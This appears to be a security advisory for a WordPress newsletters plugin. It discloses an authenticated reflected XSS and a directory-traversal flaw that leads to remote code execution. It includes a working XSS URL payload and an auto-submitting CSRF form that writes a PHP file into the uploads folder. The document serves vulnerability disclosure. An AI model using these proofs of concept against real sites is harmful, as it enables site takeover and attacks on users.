- Lack of CSRF, Authorisation and sanitisation checks in the ajax_load_new_editor() function, registered as an AJAX method, can lead to an authenticated reflected XSS issue. - Authenticated Directory Traversal leading to RCE
XSS: As an authenticated user (with a role as low as a Subscriber), open https://<BLOG>/wp-admin/admin-ajax.php?action=newsletters_load_new_editor&contentarea="><svg/onload=alert(/XSS/)>
RCE: Save the below code in an HTML file, then open it when logged in (with a role as low as Subscriber).
<html>
<body onload="document.forms[0].submit()";>
<form action="https://<BLOG>/wp-admin/admin-ajax.php?action=newsletters_exportmultiple&exportfile=../../nl_rce.php" method="POST">
<input type="hidden" name="headings[0][0]" value=""/>
<input type="hidden" name="subscribers[0][0]" value="<?php echo('Authenticated RCE'); ?>"/>
</form>
</body>
</html>
Then, the PHP file will be at https://<BLOG>/wp-content/uploads/nl_rce.php